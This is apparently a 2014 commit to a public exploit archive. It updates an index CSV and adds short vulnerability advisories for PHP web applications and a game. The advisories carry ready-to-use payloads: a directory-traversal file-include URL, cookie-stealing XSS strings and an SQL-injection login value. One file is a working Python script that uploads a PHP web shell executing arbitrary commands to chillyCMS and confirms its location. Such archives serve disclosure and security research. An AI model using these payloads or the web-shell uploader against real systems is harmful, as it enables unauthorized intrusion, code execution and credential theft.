Updated 09_15_2014

2014-09-15 04:45:11 +00:00 · 2014-09-15 04:45:11 +00:00 · 1d4c17cad7
commit 1d4c17cad7
parent e2eef480e2
10 changed files with 178 additions and 2 deletions
--- a/files.csv
+++ b/files.csv
@ -21181,7 +21181,7 @@ id,file,description,date,author,platform,type,port
 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 Nested File Manual Scan Bypass Vulnerability",2004-04-17,"Bipin Gautam",windows,local,0
 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x Mille Local Save Game File Name Buffer Overrun Vulnerability",2004-04-17,N4rK07IX,bsd,local,0
 24016,platforms/php/webapps/24016.txt,"Phorum 3.4.x Phorum_URIAuth SQL Injection Vulnerability",2004-04-19,"Janek Vind",php,webapps,0
-24017,platforms/windows/remote/24017.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR & DEP Bypass",2013-01-10,sickness,windows,remote,0
+24017,platforms/windows/remote/24017.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR & DEP Bypass (MS12-037)",2013-01-10,sickness,windows,remote,0
 24018,platforms/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload Vulnerability",2013-01-10,metasploit,php,remote,0
 24019,platforms/multiple/remote/24019.rb,"Ruby on Rails XML Processor YAML Deserialization Code Execution",2013-01-10,metasploit,multiple,remote,0
 24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer Option Element Use-After-Free",2013-01-10,metasploit,windows,remote,0
@ -30569,7 +30569,7 @@ id,file,description,date,author,platform,type,port
 33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 'PlayerOcx.ocx' Active X Control Arbitrary File Overwrite Vulnerability.",2010-02-03,"Evdokimov Dmitriy",windows,remote,0
 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80
 33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 - 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080
-33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass",2014-07-01,sickness,windows,remote,0
+33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.x Bypass (MS12-037)",2014-07-01,sickness,windows,remote,0
 33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x 'newpost.php' SQL Injection Vulnerability",2010-05-06,"Stefan Esser",php,webapps,0
 33946,platforms/php/webapps/33946.txt,"EmiratesHost Insecure Cookie Authentication Bypass Vulnerability",2010-02-01,jago-dz,php,webapps,0
 33947,platforms/php/webapps/33947.txt,"Last Wizardz 'id' Parameter SQL Injection Vulnerability",2010-01-31,"Sec Attack Team",php,webapps,0
@ -31168,6 +31168,7 @@ id,file,description,date,author,platform,type,port
 34610,platforms/php/webapps/34610.txt,"zenphoto 1.3 zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0
 34611,platforms/php/webapps/34611.txt,"Zenphoto 1.3 zp-core/admin.php Multiple Parameter XSS",2010-09-07,"Bogdan Calin",php,webapps,0
 34614,platforms/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 'frmHelp.aspx' Cross Site Scripting Vulnerability",2010-09-09,"David Hoyt",asp,webapps,0
+34615,platforms/windows/dos/34615.txt,"2K Games Vietcong 2 'CNS_AddTxt()' Format String Vulnerability",2009-08-12,"Luigi Auriemma",windows,dos,0
 34616,platforms/php/webapps/34616.txt,"Elkagroup Elkapax 'q' Parameter Cross Site Scripting Vulnerability",2009-08-13,Isfahan,php,webapps,0
 34617,platforms/php/webapps/34617.txt,"Waverider Systems Perlshop Multiple Input Validation Vulnerabilities",2009-08-06,Shadow,php,webapps,0
 34618,platforms/php/webapps/34618.txt,"Omnistar Recruiting 'resume_register.php' Cross Site Scripting Vulnerability",2009-09-06,MizoZ,php,webapps,0
@ -31188,3 +31189,11 @@ id,file,description,date,author,platform,type,port
 34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0
 34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0
 34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
+34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
+34640,platforms/php/webapps/34640.txt,"Mollify 1.6 'index.php' Cross Site Scripting Vulnerability",2010-09-15,"John Leitch",php,webapps,0
+34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 Arbitrary File Upload Vulnerability",2010-09-15,"John Leitch",php,webapps,0
+34642,platforms/php/webapps/34642.txt,"AJ Auction Pro OOPD 3.0 'txtkeyword' Parameter Cross-Site Scripting Vulnerability",2009-08-06,"599eme Man",php,webapps,0
+34643,platforms/php/webapps/34643.txt,"Silurus Classifieds category.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
+34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
+34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
+34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
--- a/platforms/php/webapps/34639.txt
+++ b/platforms/php/webapps/34639.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43260/info
+
+CMScout is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
+
+CMScout 2.09 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cmscout/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../windows/win.ini%00 
--- a/platforms/php/webapps/34640.txt
+++ b/platforms/php/webapps/34640.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43262/info
+
+Mollify is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary JavaScript code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Mollify 1.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/mollify/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(0)%3C/script%3E 
--- a/platforms/php/webapps/34641.py
+++ b/platforms/php/webapps/34641.py
@ -0,0 +1,94 @@
+source: http://www.securityfocus.com/bid/43263/info
+
+chillyCMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+chillyCMS version 1.1.3 is vulnerable; other versions may also be affected. 
+
+import socket
+
+host = 'localhost'
+path = '/chillyCMS'
+shell_path = path + '/tmp/shell.php'
+port = 80
+
+def upload_shell():
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.settimeout(8)    
+
+    s.send('POST ' + path + '/admin/media.site.php HTTP/1.1\r\n'
+           'Host: localhost\r\n'
+           'Proxy-Connection: keep-alive\r\n'
+           'User-Agent: x\r\n'
+           'Content-Length: 731\r\n'
+           'Cache-Control: max-age=0\r\n'
+           'Origin: null\r\n'
+           'Content-Type: multipart/form-data; boundary=----x\r\n'
+           'Accept: text/html\r\n'
+           'Accept-Encoding: gzip,deflate,sdch\r\n'
+           'Accept-Language: en-US,en;q=0.8\r\n'
+           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="name"\r\n'
+           '\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="pw"\r\n'
+           '\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="sentfile"\r\n'
+           '\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="destination"\r\n'
+           '\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="action"\r\n'
+           '\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="file"\r\n'
+           '\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="parent"\r\n'
+           '\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="newfolder"\r\n'
+           '\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="folder"\r\n'
+           '\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n'
+           'Content-Type: application/octet-stream\r\n'
+           '\r\n'
+           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
+           '------x--\r\n'
+           '\r\n')
+
+    resp = s.recv(8192)
+
+    http_ok = 'HTTP/1.1 200'
+    found = 'HTTP/1.1 302'
+    
+    if found not in resp[:len(found)]:
+        print 'error uploading shell'
+        return
+    else: print 'shell uploaded'
+
+    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
+           'Host: ' + host + '\r\n\r\n')
+
+    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
+    else: print 'shell located at http://' + host + shell_path
+
+upload_shell()
--- a/platforms/php/webapps/34642.txt
+++ b/platforms/php/webapps/34642.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43273/info
+
+AJ Auction Pro OOPD is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+AJ Auction Pro OOPD 3.0 is vulnerable; other versions may be affected. 
+
+http://www.example.com/ajauctionpro/oopdv3/index.php?do=search&type=&stime=&txtkeyword=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&id=all&button=Search&select2=all&select3=endsoon
--- a/platforms/php/webapps/34643.txt
+++ b/platforms/php/webapps/34643.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43278/info
+
+Silurus System is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Silurus System 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/category.php?ID="><script>alert(document.cookie);</script>
--- a/platforms/php/webapps/34644.txt
+++ b/platforms/php/webapps/34644.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43278/info
+ 
+Silurus System is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+Silurus System 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wcategory.php?ID="><script>alert(document.cookie);</script>
--- a/platforms/php/webapps/34645.txt
+++ b/platforms/php/webapps/34645.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43278/info
+  
+Silurus System is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+Silurus System 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/search.php?go=1&keywords="><script>alert(document.cookie);</script>
--- a/platforms/php/webapps/34646.txt
+++ b/platforms/php/webapps/34646.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/43284/info
+
+Blog Ink (Blink) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+The following example data is available:
+
+username: root"#
+password: foo 
--- a/platforms/windows/dos/34615.txt
+++ b/platforms/windows/dos/34615.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43129/info
+
+2K Games Vietcong 2 is prone to a format-string vulnerability because it fails to properly sanitize user-supplied data.
+
+Exploiting this issue will allow an attacker to execute arbitrary code in the context of the application, or cause denial-of-service conditions.
+
+2K Games Vietcong 2 1.10 and prior are vulnerable.
+
+http://www.exploit-db.com/sploits/34615.zip